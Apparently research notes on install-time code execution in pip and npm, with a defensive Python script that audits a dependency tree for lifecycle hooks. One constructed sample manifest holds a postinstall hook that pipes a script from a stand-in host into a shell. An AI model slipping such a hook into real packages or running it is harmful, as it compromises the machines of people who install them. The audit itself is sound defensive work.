Research notes on AI security, extension risk, and offensive testing.
pip, npm, and their lifecycle scripts make package installation a code-execution problem: building a Python sdist runs its setup.py (or declared build backend), and npm runs a package's preinstall/install/postinstall hooks, so `install` already means "run the publisher's code". AI coding agents that install dependencies on their own add a prompt-injection surface on top of that.
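As an added example (not code from these notes), a small Python audit that makes the point concrete: it walks a node_modules-style tree and reports every package whose package.json declares a hook npm would execute during install, and it separates pip downloads into wheels (unpacked as-is) and sdists (built, which executes code). The package names and manifests below are constructed samples, not real packages; the tree layout and the hook list are the assumptions.

```python
"""Audit a dependency tree for install-time code execution.

Added example, not from the original notes. Assumes a node_modules-style
layout (one package.json per package directory) and pip's wheel/sdist split.
"""
import json
import os
import tempfile

# Lifecycle scripts npm runs automatically during `npm install`
# (skipped only with --ignore-scripts).
NPM_INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def npm_install_hooks(package_json_text):
    """Return {hook: command} for every lifecycle script npm would run on install."""
    try:
        manifest = json.loads(package_json_text)
    except json.JSONDecodeError:
        return {}
    scripts = manifest.get("scripts") if isinstance(manifest, dict) else None
    if not isinstance(scripts, dict):
        return {}
    return {name: cmd for name, cmd in scripts.items() if name in NPM_INSTALL_HOOKS}


def audit_node_modules(root):
    """Map package dir (relative to root) -> install hooks found in its package.json."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" not in files:
            continue
        with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
            hooks = npm_install_hooks(fh.read())
        if hooks:
            rel = os.path.relpath(dirpath, root).replace(os.sep, "/")
            findings[rel] = hooks
    return findings


def pip_dists_that_run_code(filenames):
    """Wheels (.whl) are unpacked without running code; any other distribution
    is a source distribution that pip builds, executing setup.py or the
    PEP 517 build backend it declares."""
    return sorted(f for f in filenames if not f.endswith(".whl"))


# Constructed sample manifests (hypothetical packages, not real ones).
SAMPLE_PACKAGES = {
    "left-padish": {"name": "left-padish", "version": "1.0.0",
                    "scripts": {"test": "node test.js"}},
    "node-gyp-ish": {"name": "node-gyp-ish", "version": "0.1.0",
                     "scripts": {"install": "node-gyp rebuild"}},
    "evil-ish": {"name": "evil-ish", "version": "2.3.4",
                 "scripts": {"postinstall": "curl -s http://example.invalid/x | sh"}},
    "@scope/nested": {"name": "@scope/nested", "version": "3.0.0",
                      "scripts": {"preinstall": "node setup.js"}},
}


def demo():
    """Write the sample tree to a temp dir and audit it; returns the findings."""
    with tempfile.TemporaryDirectory() as root:
        for pkg_dir, manifest in SAMPLE_PACKAGES.items():
            path = os.path.join(root, *pkg_dir.split("/"))
            os.makedirs(path)
            with open(os.path.join(path, "package.json"), "w", encoding="utf-8") as fh:
                json.dump(manifest, fh)
        return audit_node_modules(root)


if __name__ == "__main__":
    for pkg, hooks in demo().items():
        for hook, cmd in hooks.items():
            print(f"{pkg}: {hook} -> {cmd}")
    print(pip_dists_that_run_code(["requests-2.31.0-py3-none-any.whl", "foo-1.0.tar.gz"]))
```

Point the audit at a real node_modules after an `npm install --ignore-scripts` to see which packages would have run code before deciding whether to allow their scripts; on the pip side, `pip install --only-binary=:all:` refuses sdists outright, which is the equivalent control.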
A practical take on where AI agents are heading, why current architectures age quickly, and why teams should build for the model curve instead of today's constraints.